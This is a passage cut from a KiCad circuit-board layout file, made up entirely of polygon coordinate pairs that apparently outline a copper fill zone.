50.65374) (xy 113.441932 50.366842) (xy 113.32999 50.096589) (xy 113.167475 49.853368) (xy 112.960632 49.646525) (xy 112.78624 49.53) (xy 112.960632 49.413475) (xy 113.167475 49.206632) (xy 113.32999 48.963411) (xy 113.441932 48.693158) (xy 113.499 48.40626) (xy 113.499 48.11374) (xy 113.441932 47.826842) (xy 113.32999 47.556589) (xy 113.167475 47.313368) (xy 112.960632 47.106525) (xy 112.78624 46.99) (xy 112.960632 46.873475) (xy 113.167475 46.666632) (xy 113.32999 46.423411) (xy 113.441932 46.153158) (xy 113.499 45.86626) (xy 113.499 45.57374) (xy 113.441932 45.286842) (xy 113.32999 45.016589) (xy 113.167475 44.773368) (xy 112.960632 44.566525) (xy 112.78624 44.45) (xy 112.960632 44.333475) (xy 113.167475 44.126632) (xy 113.32999 43.883411) (xy 113.441932 43.613158) (xy 113.499 43.32626) (xy 113.499 43.03374) (xy 113.441932 42.746842) (xy 113.32999 42.476589) (xy 113.167475 42.233368) (xy 112.960632 42.026525) (xy 112.778466 41.904805) (xy 112.895355 41.835178) (xy 113.111588 41.640269) (xy 113.285641 41.40692) (xy 113.410825 41.144099) (xy 113.455476 40.99689) (xy 113.334155 40.767) (xy 112.141 40.767) (xy 112.141 40.787) (xy 111.887 40.787) (xy 111.887 40.767) (xy 109.601 40.767) (xy 109.601 40.787) (xy 109.347 40.787) (xy 109.347 40.767) (xy 108.153845 40.767) (xy 108.032524 40.99689) (xy 108.077175 41.144099) (xy 108.202359 41.40692) (xy 108.376412 41.640269) (xy 108.592645 41.835178) (xy 108.709534 41.904805) (xy 108.541869 42.016836) (xy 108.524586 41.975111) (xy 108.422262 41.821972) (xy 108.292028 41.691738) (xy 108.138889 41.589414) (xy 107.968729 41.518932) (xy 107.788089 41.483) (xy 107.603911 41.483) (xy 107.423271 41.518932) (xy 107.253111 41.589414) (xy 107.188 41.63292) (xy 107.122889 41.589414) (xy 106.952729 41.518932) (xy 106.772089 41.483) (xy 106.587911 41.483) (xy 106.407271 41.518932) (xy 106.237111 41.589414) (xy 106.172 41.63292) (xy 106.106889 41.589414) (xy 105.936729 41.518932) (xy 105.756089 41.483) (xy 105.571911 41.483) (xy 105.391271 41.518932) (xy 105.221111 41.589414) (xy 105.156 41.63292) (xy 105.090889 41.589414) (xy 104.920729 41.518932) (xy 104.740089 41.483) (xy 104.555911 41.483) (xy 104.375271 41.518932) (xy 104.205111 41.589414) (xy 104.051972 41.691738) (xy 103.921738 41.821972) (xy 103.819414 41.975111) (xy 103.748932 42.145271) (xy 103.713 42.325911) (xy 73.912 42.325911) (xy 73.912 39.197775) (xy 74.003013 39.136962) (xy 74.188962 38.951013) (xy 74.335061 38.732359) (xy 74.435696 38.489405) (xy 74.455071 38.392) (xy 75.269928 38.392) (xy 75.282188 38.516482) (xy 75.318498 38.63618) (xy 75.377463 38.746494) (xy 75.456815 38.843185) (xy 75.553506 38.922537) (xy 75.66382 38.981502) (xy 75.783518 39.017812) (xy 75.908 39.030072) (xy 76.42225 39.027) (xy 76.581 38.86825) (xy 76.581 37.719) (xy 75.43175 37.719) (xy 75.273 37.87775) (xy 75.269928 38.392) (xy 74.455071 38.392) (xy 74.487 38.231486) (xy 74.487 37.968514) (xy 74.435696 37.710595) (xy 74.335061 37.467641) (xy 74.188962 37.248987) (xy 74.003013 37.063038) (xy 73.784359 36.916939) (xy 73.541405 36.816304) (xy 73.419223 36.792) (xy 75.269928 36.792) (xy 75.273 37.30625) (xy 75.43175 37.465) (xy 76.581 37.465) (xy 76.581 36.31575) (xy 76.835 36.31575) (xy 76.835 37.465) (xy 76.855 37.465) (xy 76.855 37.719) (xy 76.835 37.719) (xy 76.835 38.86825) (xy 76.99375 39.027) (xy 77.508 39.030072) (xy 77.632482 39.017812) (xy 77.75218 38.981502) (xy 77.862494 38.922537) (xy 77.959185 38.843185) (xy 78.038537 38.746494) (xy 78.097502 38.63618) (xy 78.133812 38.516482) (xy 78.134643 38.508039) (xy 78.333241 38.706637) (xy 78.568273 38.86368) (xy 78.829426 38.971853) (xy 79.106665 39.027) (xy 79.389335 39.027) (xy 79.666574 38.971853) (xy 79.927727 38.86368) (xy 80.162759 38.706637) (xy 80.362637 38.506759) (xy 80.518 38.274241) (xy 80.673363 38.506759) (xy 80.873241 38.706637) (xy 81.108273 38.86368) (xy 81.369426 38.971853) (xy 81.646665 39.027) (xy 81.929335 39.027) (xy 82.206574 38.971853) (xy 82.467727 38.86368) (xy 82.702759 38.706637) (xy 82.902637 38.506759) (xy 83.05968 38.271727) (xy 83.064067 38.261135) (xy 83.175615 38.447131) (xy 83.364586 38.655519) (xy 83.59058 38.823037) (xy 83.844913 38.943246) (xy 83.978961 38.983904) (xy 84.201 38.861915) (xy 84.201 37.719) (xy 84.181 37.719) (xy 84.181 37.465) (xy 84.201 37.465) (xy 84.201 36.322085) (xy 84.455 36.322085) (xy 84.455 37.465) (xy 84.475 37.465) (xy 84.475 37.719) (xy 84.455 37.719) (xy 84.455 38.861915) (xy 84.677039 38.983904) (xy 84.811087 38.943246) (xy 85.06542 38.823037) (xy 85.291414 38.655519) (xy 85.480385 38.447131) (xy 85.591933 38.261135) (xy 85.59632 38.271727) (xy 85.753363 38.506759) (xy 85.953241 38.706637) (xy 86.188273 38.86368) (xy 86.449426 38.971853) (xy 86.726665 39.027) (xy 87.009335 39.027) (xy 87.286574 38.971853) (xy 87.547727 38.86368) (xy 87.782759 38.706637) (xy 87.982637 38.506759) (xy 88.138 38.274241) (xy 88.293363 38.506759) (xy 88.493241 38.706637) (xy 88.728273 38.86368) (xy 88.989426 38.971853) (xy 89.266665 39.027) (xy 89.549335 39.027) (xy 89.826574 38.971853) (xy 90.087727 38.86368) (xy 90.322759 38.706637) (xy 90.522637 38.506759) (xy 90.678 38.274241) (xy 90.833363 38.506759) (xy 91.033241 38.706637) (xy 91.268273 38.86368) (xy 91.529426 38.971853) (xy 91.806665 39.027) (xy 92.089335 39.027) (xy 92.366574 38.971853) (xy 92.627727 38.86368) (xy 92.862759 38.706637) (xy 93.062637 38.506759) (xy 93.21968 38.271727) (xy 93.224067 38.261135) (xy 93.335615 38.447131) (xy 93.524586 38.655519) (xy 93.75058 38.823037) (xy 94.004913 38.943246) (xy 94.138961 38.983904) (xy 94.361 38.861915) (xy 94.361 37.719) (xy 94.615 37.719) (xy 94.615 38.861915) (xy 94.837039 38.983904) (xy 94.971087 38.943246) (xy 95.22542 38.823037) (xy 95.451414 38.655519) (xy 95.640385 38.447131) (xy 95.758 38.251018) (xy 95.875615 38.447131) (xy 96.064586 38.655519) (xy 96.29058 38.823037) (xy 96.544913 38.943246) (xy 96.678961 38.983904) (xy 96.901 38.861915) (xy 96.901 37.719) (xy 97.155 37.719) (xy 97.155 38.861915) (xy 97.377039 38.983904) (xy 97.511087 38.943246) (xy 97.76542 38.823037) (xy 97.991414 38.655519) (xy 98.180385 38.447131) (xy 98.32507 38.205881) (xy 98.419909 37.94104) (xy 98.298624 37.719) (xy 97.155 37.719) (xy 96.901 37.719) (xy 94.615 37.719) (xy 94.361 37.719) (xy 94.341 37.719) (xy 94.341 37.465) (xy 94.361 37.465) (xy 94.361 36.322085) (xy 94.615 36.322085) (xy 94.615 37.465) (xy 96.901 37.465) (xy 96.901 36.322085) (xy 97.155 36.322085) (xy 97.155 37.465) (xy 98.298624 37.465) (xy 98.416063 37.25) (xy 107.985928 37.25) (xy 107.985928 38.95) (xy 107.998188 39.074482) (xy 108.034498 39.19418) (xy 108.093463 39.304494) (xy 108.172815 39.401185) (xy 108.269506 39.480537) (xy 108.37982 39.539502) (xy 108.460466 39.563966) (xy 108.376412 39.639731) (xy 108.202359 39.87308) (xy 108.077175 40.135901) (xy 108.032524 40.28311) (xy 108.153845 40.513) (xy 109.347 40.513) (xy 109.347 40.493) (xy 109.601 40.493) (xy 109.601 40.513) (xy 111.887 40.513) (xy 111.887 40.493) (xy 112.141 40.493) (xy 112.141 40.513) (xy 113.334155 40.513) (xy 113.455476 40.28311) (xy 113.410825 40.135901) (xy 113.285641 39.87308) (xy 113.111588 39.639731) (xy 112.895355 39.444822) (xy 112.778466 39.375195) (xy 112.960632 39.253475) (xy 113.167475 39.046632) (xy 113.32999 38.803411) (xy 113.441932 38.533158) (xy 113.499 38.24626) (xy 113.499 37.95374) (xy 113.441932 37.666842) (xy 113.32999 37.396589) (xy 113.167475 37.153368) (xy 112.960632 36.946525) (xy 112.717411 36.78401) (xy 112.447158 36.672068) (xy 112.16026 36.615) (xy 111.86774 36.615) (xy 111.580842 36.672068) (xy 111.310589 36.78401) (xy 111.067368 36.946525) (xy 110.935513 37.07838) (xy 110.913502 37.00582) (xy 110.854537 36.895506) (xy 110.775185 36.798815) (xy 110.678494 36.719463) (xy 110.56818 36.660498) (xy 110.448482 36.624188) (xy 110.324 36.611928) (xy 108.624 36.611928) (xy 108.499518 36.624188) (xy 108.37982 36.660498) (xy 108.269506 36.719463) (xy 108.172815 36.798815) (xy 108.093463 36.895506) (xy 108.034498 37.00582) (xy 107.998188 37.125518) (xy 107.985928 37.25) (xy 98.416063 37.25) (xy 98.419909 37.24296) (xy 98.32507 36.978119) (xy 98.180385 36.736869) (xy 97.991414 36.528481) (xy 97.76542 36.360963) (xy 97.511087 36.240754) (xy 97.377039 36.200096) (xy 97.155 36.322085) (xy 96.901 36.322085) (xy 96.678961 36.200096) (xy 96.544913 36.240754) (xy 96.29058 36.360963) (xy 96.064586 36.528481) (xy 95.875615 36.736869) (xy 95.758 36.932982) (xy 95.640385 36.736869) (xy 95.451414 36.528481) (xy 95.22542 36.360963) (xy 94.971087 36.240754) (xy 94.837039 36.200096) (xy 94.615 36.322085) (xy 94.361 36.322085) (xy 94.138961 36.200096) (xy 94.004913 36.240754) (xy 93.75058 36.360963) (xy 93.524586 36.528481) (xy 93.335615 36.736869) (xy 93.224067 36.922865) (xy 93.21968 36.912273) (xy 93.062637 36.677241) (xy 92.862759 36.477363) (xy 92.627727 36.32032) (xy 92.366574 36.212147) (xy 92.089335 36.157) (xy 91.806665 36.157) (xy 91.529426 36.212147) (xy 91.268273 36.32032) (xy 91.033241 36.477363) (xy 90.833363 36.677241) (xy 90.678 36.909759) (xy 90.522637 36.677241) (xy 90.322759 36.477363) (xy 90.087727 36.32032) (xy 89.826574 36.212147) (xy 89.549335 36.157) (xy 89.266665 36.157) (xy 88.989426 36.212147) (xy 88.728273 36.32032) (xy 88.493241 36.477363) (xy 88.293363 36.677241) (xy 88.138 36.909759) (xy 87.982637 36.677241) (xy 87.782759 36.477363) (xy 87.547727 36.32032) (xy 87.286574 36.212147) (xy 87.009335 36.157) (xy 86.726665 36.157) (xy 86.449426 36.212147) (xy 86.188273 36.32032) (xy 85.953241 36.477363) (xy 85.753363 36.677241) (xy 85.59632 36.912273) (xy 85.591933 36.922865) (xy 85.480385 36.736869) (xy 85.291414 36.528481) (xy 85.06542 36.360963) (xy 84.811087 36.240754) (xy 84.677039 36.200096) (xy 84.455 36.322085) (xy 84.201 36.322085) (xy 83.978961 36.200096) (xy 83.844913 36.240754) (xy 83.59058 36.360963) (xy 83.364586 36.528481) (xy 83.175615 36.736869) (xy 83.064067 36.922865) (xy 83.05968 36.912273) (xy 82.902637 36.677241) (xy 82.702759 36.477363) (xy 82.467727 36.32032) (xy 82.206574 36.212147) (xy 81.929335 36.157) (xy 81.646665 36.157) (xy 81.369426 36.212147) (xy 81.108273 36.32032) (xy 80.873241 36.477363) (xy 80.673363 36.677241) (xy 80.518 36.909759) (xy 80.362637 36.677241) (xy 80.162759 36.477363) (xy 80.008 36.373957) (xy 80.008 34.835535) (xy 80.076586 34.732889) (xy 80.147068 34.562729) (xy 80.183 34.382089) (xy 80.183 34.197911) (xy 80.147068 34.017271) (xy 80.076586 33.847111) (xy 79.974262 33.693972) (xy 79.844028 33.563738) (xy 79.690889 33.461414) (xy 79.520729 33.390932) (xy 79.340089 33.355) (xy 79.155911 33.355) (xy 78.975271 33.390932) (xy 78.805111 33.461414) (xy 78.651972 33.563738) (xy 78.521738 33.693972) (xy 78.419414 33.847111) (xy 78.348932 34.017271) (xy 78.313 34.197911) (xy 78.313 34.382089) (xy 78.348932 34.562729) (xy 78.419414 34.732889) (xy 78.488001 34.835537) (xy 78.488 36.373956) (xy 78.333241 36.477363) (xy 78.134643 36.675961) (xy 78.133812 36.667518) (xy 78.097502 36.54782) (xy 78.038537 36.437506) (xy 77.959185 36.340815) (xy 77.862494 36.261463) (xy 77.75218 36.202498) (xy 77.632482 36.166188) (xy 77.508 36.153928) (xy 76.99375 36.157) (xy 76.835 36.31575) (xy 76.581 36.31575) (xy 76.42225 36.157) (xy 75.908 36.153928) (xy 75.783518 36.166188) (xy 75.66382 36.202498) (xy 75.553506 36.261463) (xy 75.456815 36.340815) (xy 75.377463 36.437506) (xy 75.318498 36.54782) (xy 75.282188 36.667518) (xy 75.269928 36.792) (xy 73.419223 36.792) (xy 73.283486 36.765) (xy 73.020514 36.765) (xy 72.762595 36.816304) (xy 72.519641 36.916939) (xy 72.300987 37.063038) (xy 72.115038 37.248987) (xy 71.968939 37.467641) (xy 71.868304 37.710595) (xy 71.817 37.968514) (xy 68.69207 37.968514) (xy 68.701909 37.94104) (xy 68.580624 37.719) (xy 67.437 37.719) (xy 67.183 37.719) (xy 64.897 37.719) (xy 64.643 37.719) (xy 64.623 37.719) (xy 64.623 37.465) (xy 64.643 37.465) (xy 64.643 36.322085) (xy 64.897 36.322085) (xy 64.897 37.465) (xy 67.183 37.465) (xy 67.183 36.322085) (xy 67.437 36.322085) (xy 67.437 37.465) (xy 68.580624 37.465) (xy 68.701909 37.24296) (xy 68.60707 36.978119) (xy 68.462385 36.736869) (xy 68.273414 36.528481) (xy 68.04742 36.360963) (xy 67.793087 36.240754) (xy 67.659039 36.200096) (xy 67.437 36.322085) (xy 67.183 36.322085) (xy 66.960961 36.200096) (xy 66.826913 36.240754) (xy 66.57258 36.360963) (xy 66.346586 36.528481) (xy 66.157615 36.736869) (xy 66.04 36.932982) (xy 65.922385 36.736869) (xy 65.733414 36.528481) (xy 65.50742 36.360963) (xy 65.253087 36.240754) (xy 65.119039 36.200096) (xy 64.897 36.322085) (xy 64.643 36.322085) (xy 64.420961 36.200096) (xy 64.286913 36.240754) (xy 64.03258 36.360963) (xy 63.806586 36.528481) (xy 63.617615 36.736869) (xy 63.506067 36.922865) (xy 63.50168 36.912273) (xy 63.344637 36.677241) (xy 63.144759 36.477363) (xy 62.99 36.373957) (xy 62.99 36.105535) (xy 63.058586 36.002889) (xy 63.129068 35.832729) (xy 63.165 35.652089) (xy 63.165 35.467911) (xy 63.129068 35.287271) (xy 63.058586 35.117111) (xy 62.956262 34.963972) (xy 62.826028 34.833738) (xy 62.672889 34.731414) (xy 62.502729 34.660932) (xy 62.322089 34.625) (xy 62.137911 34.625) (xy 61.957271 34.660932) (xy 61.787111 34.731414) (xy 61.633972 34.833738) (xy 61.503738 34.963972) (xy 61.401414 35.117111) (xy 61.330932 35.287271) (xy 61.295 35.467911) (xy 61.295 35.652089) (xy 61.330932 35.832729) (xy 61.401414 36.002889) (xy 61.470001 36.105536) (xy 61.470001 36.373956) (xy 61.315241 36.477363) (xy 61.115363 36.677241) (xy 60.96 36.909759) (xy 60.804637 36.677241) (xy 60.604759 36.477363) (xy 60.369727 36.32032) (xy 60.108574 36.212147) (xy 59.831335 36.157) (xy 59.548665 36.157) (xy 59.271426 36.212147) (xy 59.010273 36.32032) (xy 58.775241 36.477363) (xy 58.575363 36.677241) (xy 58.42 36.909759) (xy 58.264637 36.677241) (xy 58.064759 36.477363) (xy 57.829727 36.32032) (xy 57.568574 36.212147) (xy 57.291335 36.157) (xy 57.008665 36.157) (xy 56.731426 36.212147) (xy 56.470273 36.32032) (xy 56.235241 36.477363) (xy 56.035363 36.677241) (xy 55.87832 36.912273) (xy 55.873933 36.922865) (xy 55.762385 36.736869) (xy 55.573414 36.528481) (xy 55.34742 36.360963) (xy 55.093087 36.240754) (xy 54.959039 36.200096) (xy 54.737 36.322085) (xy 54.483 36.322085) (xy 54.260961 36.200096) (xy 54.126913 36.240754) (xy 53.87258 36.360963) (xy 53.646586 36.528481) (xy 53.457615 36.736869) (xy 53.346067 36.922865) (xy 53.34168 36.912273) (xy 53.184637 36.677241) (xy 52.984759 36.477363) (xy 52.83 36.373957) (xy 52.83 35.343535) (xy 52.898586 35.240889) (xy 52.969068 35.070729) (xy 53.005 34.890089) (xy 53.005 34.705911) (xy 52.969068 34.525271) (xy 52.898586 34.355111) (xy 52.796262 34.201972) (xy 52.666028 34.071738) (xy 52.512889 33.969414) (xy 52.342729 33.898932) (xy 52.162089 33.863) (xy 51.977911 33.863) (xy 51.797271 33.898932) (xy 51.627111 33.969414) (xy 51.473972 34.071738) (xy 51.343738 34.201972) (xy 51.241414 34.355111) (xy 51.170932 34.525271) (xy 51.135 34.705911) (xy 51.135 34.890089) (xy 51.170932 35.070729) (xy 51.241414 35.240889) (xy 51.310001 35.343537) (xy 51.31 36.373956) (xy 51.155241 36.477363) (xy 50.955363 36.677241) (xy 50.8 36.909759) (xy 50.644637 36.677241) (xy 50.444759 36.477363) (xy 50.29 36.373957) (xy 50.29 34.581535) (xy 50.358586 34.478889) (xy 50.429068 34.308729) (xy 50.465 34.128089) (xy 50.465 33.943911) (xy 50.429068 33.763271) (xy 50.358586 33.593111) (xy 50.256262 33.439972) (xy 50.126028 33.309738) (xy 49.972889 33.207414) (xy 49.802729 33.136932) (xy 49.622089 33.101) (xy 49.437911 33.101) (xy 49.257271 33.136932) (xy 49.087111 33.207414) (xy 48.933972 33.309738) (xy 48.803738 33.439972) (xy 48.701414 33.593111) (xy 48.630932 33.763271) (xy 48.595 33.943911) (xy 48.595 34.128089) (xy 48.630932 34.308729) (xy 48.701414 34.478889) (xy 48.770001 34.581537) (xy 48.77 36.373956) (xy 48.615241 36.477363) (xy 48.416643 36.675961) (xy 48.415812 36.667518) (xy 48.379502 36.54782) (xy 48.320537 36.437506) (xy 48.241185 36.340815) (xy 48.144494 36.261463) (xy 48.03418 36.202498) (xy 47.914482 36.166188) (xy 47.79 36.153928) (xy 47.27575 36.157) (xy 47.117 36.31575) (xy 46.863 36.31575) (xy 46.70425 36.157) (xy 46.19 36.153928) (xy 46.065518 36.166188) (xy 45.94582 36.202498) (xy 45.835506 36.261463) (xy 45.738815 36.340815) (xy 45.659463 36.437506) (xy 45.600498 36.54782) (xy 45.564188 36.667518) (xy 45.551928 36.792) (xy 45.341086 36.792) (xy 45.278586 36.641111) (xy 45.21 36.538465) (xy 45.21 33.565535) (xy 45.278586 33.462889) (xy 45.349068 33.292729) (xy 45.385 33.112089) (xy 45.385 32.927911) (xy 45.349068 32.747271) (xy 45.278586 32.577111) (xy 45.176262 32.423972) (xy 45.046028 32.293738) (xy 44.892889 32.191414) (xy 44.722729 32.120932) (xy 44.542089 32.085) (xy 44.357911 32.085) (xy 44.177271 32.120932) (xy 44.007111 32.191414) (xy 43.853972 32.293738) (xy 43.723738 32.423972) (xy 43.621414 32.577111) (xy 43.550932 32.747271) (xy 43.515 32.927911) (xy 37.676118 32.927911) (xy 37.517158 32.862068) (xy 37.23026 32.805) (xy 36.93774 32.805) (xy 36.650842 32.862068) (xy 36.380589 32.97401) (xy 36.137368 33.136525) (xy 36.005513 33.26838) (xy 35.983502 33.19582) (xy 35.924537 33.085506) (xy 35.845185 32.988815) (xy 35.748494 32.909463) (xy 35.63818 32.850498) (xy 35.518482 32.814188) (xy 35.394 32.801928) (xy 33.694 32.801928) (xy 33.569518 32.814188) (xy 33.44982 32.850498) (xy 33.339506 32.909463) (xy 33.242815 32.988815) (xy 33.163463 33.085506) (xy 33.104498 33.19582) (xy 33.068188 33.315518) (xy 33.055928 33.44) (xy 31.265126 33.44) (xy 31.255696 33.392595) (xy 31.155061 33.149641) (xy 31.008962 32.930987) (xy 30.823013 32.745038) (xy 30.604359 32.598939) (xy 30.361405 32.498304) (xy 30.103486 32.447) (xy 29.840514 32.447) (xy 29.582595 32.498304) (xy 29.339641 32.598939) (xy 29.120987 32.745038) (xy 28.935038 32.930987) (xy 28.788939 33.149641) (xy 28.688304 33.392595) (xy 28.637 33.650514) (xy 23.687 33.650514) (xy 23.635696 33.392595) (xy 23.535061 33.149641) (xy 23.388962 32.930987) (xy 23.203013 32.745038) (xy 22.984359 32.598939) (xy 22.741405 32.498304) (xy 22.483486 32.447) (xy 22.220514 32.447) (xy 21.962595 32.498304) (xy 21.719641 32.598939) (xy 21.500987 32.745038) (xy 21.315038 32.930987) (xy 21.168939 33.149641) (xy 21.068304 33.392595) (xy 21.017 33.650514) (xy 21.017 33.913486) (xy 21.068304 34.171405) (xy 21.168939 34.414359) (xy 21.315038 34.633013) (xy 21.500987 34.818962) (xy 21.680283 34.938763) (xy 21.624905 34.961701) (xy 21.373495 35.129688) (xy 21.159688 35.343495) (xy 20.991701 35.594905) (xy 20.875989 35.874257) (xy 20.817 36.170816) (xy 20.817 36.473184) (xy 20.875989 36.769743) (xy 20.991701 37.049095) (xy 21.159688 37.300505) (xy 21.226127 37.366944) (xy 21.20782 37.372498) (xy 21.097506 37.431463) (xy 21.000815 37.510815) (xy 20.921463 37.607506) (xy 20.862498 37.71782) (xy 20.826188 37.837518) (xy 20.813928 37.962) (xy 20.71 37.962) (xy 20.71 31.263563) (xy 20.78201 31.437411) (xy 20.944525 31.680632) (xy 21.151368 31.887475) (xy 21.394589 32.04999) (xy 21.664842 32.161932) (xy 21.95174 32.219) (xy 22.24426 32.219) (xy 22.531158 32.161932) (xy 22.801411 32.04999) (xy 23.044632 31.887475) (xy 23.176487 31.75562) (xy 23.198498 31.82818) (xy 23.257463 31.938494) (xy 23.336815 32.035185) (xy 23.433506 32.114537) (xy 23.54382 32.173502) (xy 23.663518 32.209812) (xy 23.788 32.222072) (xy 25.488 32.222072) (xy 25.612482 32.209812) (xy 25.73218 32.173502) (xy 25.842494 32.114537) (xy 25.939185 32.035185) (xy 26.018537 31.938494) (xy 26.077502 31.82818) (xy 26.113812 31.708482) (xy 26.126072 31.584) (xy 26.126072 29.884) (xy 26.113812 29.759518) (xy 26.077502 29.63982) (xy 26.018537 29.529506) (xy 25.939185 29.432815) (xy 25.842494 29.353463) (xy 25.73218 29.294498) (xy 25.612482 29.258188) (xy 25.488 29.245928) (xy 23.788 29.245928) (xy 23.663518 29.258188) (xy 23.54382 29.294498) (xy 23.433506 29.353463) (xy 23.336815 29.432815) (xy 23.257463 29.529506) (xy 23.198498 29.63982) (xy 23.176487 29.71238) (xy 23.044632 29.580525) (xy 22.801411 29.41801) (xy 22.540506 29.30994) (xy 22.777727 29.21168) (xy 23.012759 29.054637) (xy 23.212637 28.854759) (xy 23.36968 28.619727) (xy 23.477853 28.358574) (xy 23.533 28.081335) (xy 23.533 27.798665) (xy 23.477853 27.521426) (xy 23.36968 27.260273) (xy 23.212637 27.025241) (xy 23.012759 26.825363) (xy 22.778872 26.669085) (xy 22.839514 26.636671) (xy 22.895773 26.444928) (xy 25.926677 26.444928) (xy 26.232859 26.888503) (xy 26.820306 27.203954) (xy 27.458008 27.39874) (xy 28.121457 27.465372) (xy 28.785158 27.401292) (xy 29.423605 27.208962) (xy 30.012262 26.895772) (xy 30.023141 26.888503) (xy 30.329323 26.444928) (xy 28.128 24.243605) (xy 25.926677 26.444928) (xy 22.895773 26.444928) (xy 22.911097 26.392702) (xy 22.098 25.579605) (xy 21.284903 26.392702) (xy 21.356486 26.636671) (xy 21.420992 26.667194) (xy 21.418273 26.66832) (xy 21.183241 26.825363) (xy 20.983363 27.025241) (xy 20.82632 27.260273) (xy 20.718147 27.521426) (xy 20.71 27.562383) (xy 20.71 25.780294) (xy 20.794397 26.016292) (xy 20.861329 26.141514) (xy 21.105298 26.213097) (xy 21.918395 25.4) (xy 22.277605 25.4) (xy 23.090702 26.213097) (xy 23.334671 26.141514) (xy 23.455571 25.886004) (xy 23.5243 25.611816) (xy 23.538217 25.329488) (xy 23.496787 25.04987) (xy 23.401603 24.783708) (xy 23.334671 24.658486) (xy 23.090702 24.586903) (xy 22.277605 25.4) (xy 21.918395 25.4) (xy 21.105298 24.586903) (xy 20.861329 24.658486) (xy 20.740429 24.913996) (xy 20.71 25.03539) (xy 20.71 24.407298) (xy 21.284903 24.407298) (xy 22.098 25.220395) (xy 22.911097 24.407298) (xy 22.839514 24.163329) (xy 22.615765 24.057457) (xy 24.726628 24.057457) (xy 24.790708 24.721158) (xy 24.983038 25.359605) (xy 25.296228 25.948262) (xy 25.303497 25.959141) (xy 25.747072 26.265323) (xy 27.948395 24.064) (xy 28.307605 24.064) (xy 30.508928 26.265323) (xy 30.952503 25.959141) (xy 30.992475 25.884702) (xy 36.016903 25.884702) (xy 36.088486 26.128671) (xy 36.343996 26.249571) (xy 36.618184 26.3183) (xy 36.900512 26.332217) (xy 37.18013 26.290787) (xy 37.446292 26.195603) (xy 37.571514 26.128671) (xy 37.643097 25.884702) (xy 36.83 25.071605) (xy 36.016903 25.884702) (xy 30.992475 25.884702) (xy 31.267954 25.371694) (xy 31.392938 24.962512) (xy 35.389783 24.962512) (xy 35.431213 25.24213) (xy 35.526397 25.508292) (xy 35.593329 25.633514) (xy 35.837298 25.705097) (xy 36.650395 24.892) (xy 37.009605 24.892) (xy 37.822702 25.705097) (xy 38.066671 25.633514) (xy 38.187571 25.378004) (xy 38.2563 25.103816) (xy 38.270217 24.821488) (xy 38.228787 24.54187) (xy 38.133603 24.275708) (xy 38.066671 24.150486) (xy 37.86734 24.092) (xy 38.891928 24.092) (xy 38.891928 25.692) (xy 38.904188 25.816482) (xy 38.940498 25.93618) (xy 38.999463 26.046494) (xy 39.078815 26.143185) (xy 39.175506 26.222537) (xy 39.28582 26.281502) (xy 39.405518 26.317812) (xy 39.53 26.330072) (xy 41.13 26.330072) (xy 41.254482 26.317812) (xy 41.37418 26.281502) (xy 41.484494 26.222537) (xy 41.581185 26.143185) (xy 41.660537 26.046494) (xy 41.719502 25.93618) (xy 41.755812 25.816482) (xy 41.768072 25.692) (xy 41.768072 24.092) (xy 41.755812 23.967518) (xy 41.719502 23.84782) (xy 41.660537 23.737506) (xy 41.581185 23.640815) (xy 41.484494 23.561463) (xy 41.37418 23.502498) (xy 41.254482 23.466188) (xy 41.13 23.453928) (xy 39.53 23.453928) (xy 39.405518 23.466188) (xy 39.28582 23.502498) (xy 39.175506 23.561463) (xy 39.078815 23.640815) (xy 38.999463 23.737506) (xy 38.940498 23.84782) (xy 38.904188 23.967518) (xy 38.891928 24.092) (xy 37.86734 24.092) (xy 37.822702 24.078903) (xy 37.009605 24.892) (xy 36.650395 24.892) (xy 35.837298 24.078903) (xy 35.593329 24.150486) (xy 35.472429 24.405996) (xy 35.4037 24.680184) (xy 35.389783 24.962512) (xy 31.392938 24.962512) (xy 31.46274 24.733992) (xy 31.529372 24.070543) (xy 31.512839 23.899298) (xy 36.016903 23.899298) (xy 36.83 24.712395) (xy 37.643097 23.899298) (xy 37.571514 23.655329) (xy 37.316004 23.534429) (xy 37.041816 23.4657) (xy 36.759488 23.451783) (xy 36.47987 23.493213) (xy 36.213708 23.588397) (xy 36.088486 23.655329) (xy 36.016903 23.899298) (xy 31.512839 23.899298) (xy 31.465292 23.406842) (xy 31.272962 22.768395) (xy 31.248496 22.722408) (xy 44.911 22.722408) (xy 44.911 22.997592) (xy 44.964686 23.26749) (xy 45.069995 23.521727) (xy 45.22288 23.750535) (xy 45.417465 23.94512) (xy 45.646273 24.098005) (xy 45.90051 24.203314) (xy 46.105001 24.24399) (xy 46.105 28.837479) (xy 46.075241 28.857363) (xy 45.875363 29.057241) (xy 45.71832 29.292273) (xy 45.610147 29.553426) (xy 45.555 29.830665) (xy 45.555 30.113335) (xy 45.610147 30.390574) (xy 45.71832 30.651727) (xy 45.875363 30.886759) (xy 46.075241 31.086637) (xy 46.310273 31.24368) (xy 46.571426 31.351853) (xy 46.848665 31.407) (xy 47.131335 31.407) (xy 47.408574 31.351853) (xy 47.669727 31.24368) (xy 47.904759 31.086637) (xy 48.104637 30.886759) (xy 48.26 30.654241) (xy 48.415363 30.886759) (xy 48.615241 31.086637) (xy 48.850273 31.24368) (xy 49.111426 31.351853) (xy 49.388665 31.407) (xy 49.671335 31.407) (xy 49.948574 31.351853) (xy 50.209727 31.24368) (xy 50.444759 31.086637) (xy 50.644637 30.886759) (xy 50.8 30.654241) (xy 50.955363 30.886759) (xy 51.155241 31.086637) (xy 51.390273 31.24368) (xy 51.651426 31.351853) (xy 51.928665 31.407) (xy 52.211335 31.407) (xy 52.488574 31.351853) (xy 52.749727 31.24368) (xy 52.984759 31.086637) (xy 53.184637 30.886759) (xy 53.34 30.654241) (xy 53.495363 30.886759) (xy 53.695241 31.086637) (xy 53.930273 31.24368) (xy 54.191426 31.351853) (xy 54.468665 31.407) (xy 54.751335 31.407) (xy 55.028574 31.351853) (xy 55.289727 31.24368) (xy 55.524759 31.086637) (xy 55.724637 30.886759) (xy 55.88 30.654241) (xy 56.035363 30.886759) (xy 56.235241 31.086637) (xy 56.470273 31.24368) (xy 56.731426 31.351853) (xy 57.008665 31.407) (xy 57.291335 31.407) (xy 57.568574 31.351853) (xy 57.829727 31.24368) (xy 58.064759 31.086637) (xy 58.264637 30.886759) (xy 58.42 30.654241) (xy 58.575363 30.886759) (xy 58.775241 31.086637) (xy 59.010273 31.24368) (xy 59.271426 31.351853) (xy 59.548665 31.407) (xy 59.831335 31.407) (xy 60.108574 31.351853) (xy 60.369727 31.24368) (xy 60.604759 31.086637) (xy 60.804637 30.886759) (xy 60.96 30.654241) (xy 61.115363 30.886759) (xy 61.315241 31.086637) (xy 61.550273 31.24368) (xy 61.811426 31.351853) (xy 62.088665 